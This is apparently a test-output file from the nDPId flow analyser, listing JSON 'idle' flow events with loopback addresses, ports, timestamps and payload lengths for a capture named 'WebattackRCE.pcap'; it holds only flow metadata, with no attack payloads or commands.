+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":403,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277310,"flow_last_seen":1576420277310,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50350,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":404,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277311,"flow_last_seen":1576420277311,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50352,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":405,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277313,"flow_last_seen":1576420277313,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50354,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":406,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277314,"flow_last_seen":1576420277314,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50356,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":407,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277315,"flow_last_seen":1576420277315,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50358,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":408,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277317,"flow_last_seen":1576420277317,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50360,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":409,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277319,"flow_last_seen":1576420277319,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50362,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":410,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277321,"flow_last_seen":1576420277321,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50364,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":411,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277322,"flow_last_seen":1576420277322,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50366,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":412,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277324,"flow_last_seen":1576420277324,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50368,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":413,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277325,"flow_last_seen":1576420277325,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50370,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":414,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277326,"flow_last_seen":1576420277326,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50372,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":415,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277328,"flow_last_seen":1576420277328,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50374,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":416,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277329,"flow_last_seen":1576420277329,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50376,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":417,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277331,"flow_last_seen":1576420277331,"flow_idle_time":7560000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50378,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":418,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277333,"flow_last_seen":1576420277333,"flow_idle_time":7560000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50380,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":419,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277334,"flow_last_seen":1576420277334,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50382,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":420,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277336,"flow_last_seen":1576420277336,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50384,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":421,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277337,"flow_last_seen":1576420277337,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50386,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":422,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277339,"flow_last_seen":1576420277339,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50388,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":423,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277340,"flow_last_seen":1576420277340,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50390,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":424,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277342,"flow_last_seen":1576420277342,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50392,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":425,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277343,"flow_last_seen":1576420277343,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50394,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":426,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277344,"flow_last_seen":1576420277344,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50396,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":427,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277345,"flow_last_seen":1576420277345,"flow_idle_time":7560000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50398,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":428,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277347,"flow_last_seen":1576420277347,"flow_idle_time":7560000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50400,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":429,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277349,"flow_last_seen":1576420277349,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50402,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":430,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277350,"flow_last_seen":1576420277350,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50404,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":431,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277352,"flow_last_seen":1576420277352,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50406,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":432,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277354,"flow_last_seen":1576420277354,"flow_idle_time":7560000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50408,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":433,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277355,"flow_last_seen":1576420277355,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50410,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":434,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277357,"flow_last_seen":1576420277357,"flow_idle_time":7560000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50412,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":435,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277358,"flow_last_seen":1576420277358,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50414,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":436,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277359,"flow_last_seen":1576420277359,"flow_idle_time":7560000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50416,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":437,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277361,"flow_last_seen":1576420277361,"flow_idle_time":7560000,"flow_min_l4_payload_len":130,"flow_max_l4_payload_len":130,"flow_tot_l4_payload_len":130,"flow_avg_l4_payload_len":130,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50418,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":438,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277375,"flow_last_seen":1576420277375,"flow_idle_time":7560000,"flow_min_l4_payload_len":205,"flow_max_l4_payload_len":205,"flow_tot_l4_payload_len":205,"flow_avg_l4_payload_len":205,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50438,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":439,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277378,"flow_last_seen":1576420277378,"flow_idle_time":7560000,"flow_min_l4_payload_len":205,"flow_max_l4_payload_len":205,"flow_tot_l4_payload_len":205,"flow_avg_l4_payload_len":205,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50440,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":440,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277381,"flow_last_seen":1576420277381,"flow_idle_time":7560000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50442,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":441,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277383,"flow_last_seen":1576420277383,"flow_idle_time":7560000,"flow_min_l4_payload_len":222,"flow_max_l4_payload_len":222,"flow_tot_l4_payload_len":222,"flow_avg_l4_payload_len":222,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50444,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":442,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277386,"flow_last_seen":1576420277386,"flow_idle_time":7560000,"flow_min_l4_payload_len":218,"flow_max_l4_payload_len":218,"flow_tot_l4_payload_len":218,"flow_avg_l4_payload_len":218,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50446,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":443,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277387,"flow_last_seen":1576420277387,"flow_idle_time":7560000,"flow_min_l4_payload_len":215,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":215,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50448,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":444,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277389,"flow_last_seen":1576420277389,"flow_idle_time":7560000,"flow_min_l4_payload_len":215,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":215,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50450,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":445,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277391,"flow_last_seen":1576420277391,"flow_idle_time":7560000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50452,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":446,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277392,"flow_last_seen":1576420277392,"flow_idle_time":7560000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":216,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50454,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":447,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277394,"flow_last_seen":1576420277394,"flow_idle_time":7560000,"flow_min_l4_payload_len":215,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":215,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50456,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":448,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277395,"flow_last_seen":1576420277395,"flow_idle_time":7560000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":216,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50458,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
